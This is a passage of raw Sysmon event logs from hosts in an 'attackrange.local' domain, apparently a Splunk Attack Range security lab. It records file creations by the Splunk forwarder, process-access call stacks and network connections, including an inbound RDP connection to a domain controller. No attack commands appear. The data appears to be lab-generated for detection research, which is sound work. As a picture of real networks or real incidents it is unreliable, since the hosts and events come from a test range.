Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5228B03D0AE93ECD425EC2E064CDC731,SHA256=37A7839EEBA9947F8CC06F9CF56CBE49AEC0487723A16E53E26880685BB9AC7D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051818Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:25.841{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53476-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001051817Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:27.619{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90F0B5F4ECF75512B27541C589208056,SHA256=AF309DE717A03C0E2902358E2DF28B48A6D2C422E2CF03C54FACD84208D56895,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000980194Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:27.723{69CF5F33-8C63-6151-F479-00000000FD01}33483424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980193Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:27.503{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8C63-6151-F479-00000000FD01}3348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980192Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:27.503{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980191Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:27.503{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980190Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:27.503{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980189Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:27.503{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980188Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:27.503{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980187Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:27.503{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980186Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:27.503{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980185Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:27.503{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980184Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:27.503{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980183Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:27.503{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8C63-6151-F479-00000000FD01}3348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000980182Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:27.503{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8C63-6151-F479-00000000FD01}3348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000980181Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:27.488{69CF5F33-8C63-6151-F479-00000000FD01}3348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000980180Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:27.253{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=53EDB51D84B45B67B4F030BF48E55580,SHA256=5F3BE156AFC59FC3CD5BE1E2A2B735D181BBC74E951B399FCF64A369AC569744,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051816Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:27.286{5EBD8912-79C0-6151-E577-00000000FC01}42962992C:\Windows\Explorer.EXE{5EBD8912-85DC-6151-8B79-00000000FC01}4220C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051815Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:27.286{5EBD8912-79C0-6151-E577-00000000FC01}42962992C:\Windows\Explorer.EXE{5EBD8912-85DC-6151-8B79-00000000FC01}4220C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051814Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:27.286{5EBD8912-79C0-6151-E577-00000000FC01}42962992C:\Windows\Explorer.EXE{5EBD8912-85DC-6151-8B79-00000000FC01}4220C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051813Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:27.286{5EBD8912-79C0-6151-E577-00000000FC01}42963900C:\Windows\Explorer.EXE{5EBD8912-85DC-6151-8C79-00000000FC01}32C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62890|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051812Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:27.286{5EBD8912-79C0-6151-E577-00000000FC01}42963900C:\Windows\Explorer.EXE{5EBD8912-85DC-6151-8C79-00000000FC01}32C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+6284c|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051811Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:27.286{5EBD8912-79C0-6151-E577-00000000FC01}42963900C:\Windows\Explorer.EXE{5EBD8912-85DC-6151-8C79-00000000FC01}32C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051810Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:27.286{5EBD8912-79C0-6151-E577-00000000FC01}42963900C:\Windows\Explorer.EXE{5EBD8912-85DC-6151-8C79-00000000FC01}32C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051809Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:27.172{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051808Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:27.172{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051807Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:27.172{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051806Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:27.172{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001051822Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:26.584{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com41923-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001051821Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:28.733{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=69BF5D81F2D91B1BDED529CA3B6E2B5B,SHA256=A7C966FCD874F44E65690FA57E9724AF714E3FB0F06DB00BB5BBDE5E913AC3A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051820Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:28.733{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CAAE754B92B14C4A51D1F76C85BFBD32,SHA256=C525677EEF6E5AFD0D915478A7DB5001B0C64CFFADDDB0C1CDD33E945491FEA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051819Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:28.633{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A71C144CB6F1934504581B3CFE2037C9,SHA256=167A53FD3F3168EC24238918A58C5E365A97FCAC7B4D4B6D5094B439BD7882FA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000980223Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:28.893{69CF5F33-8C64-6151-F679-00000000FD01}31722268C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program 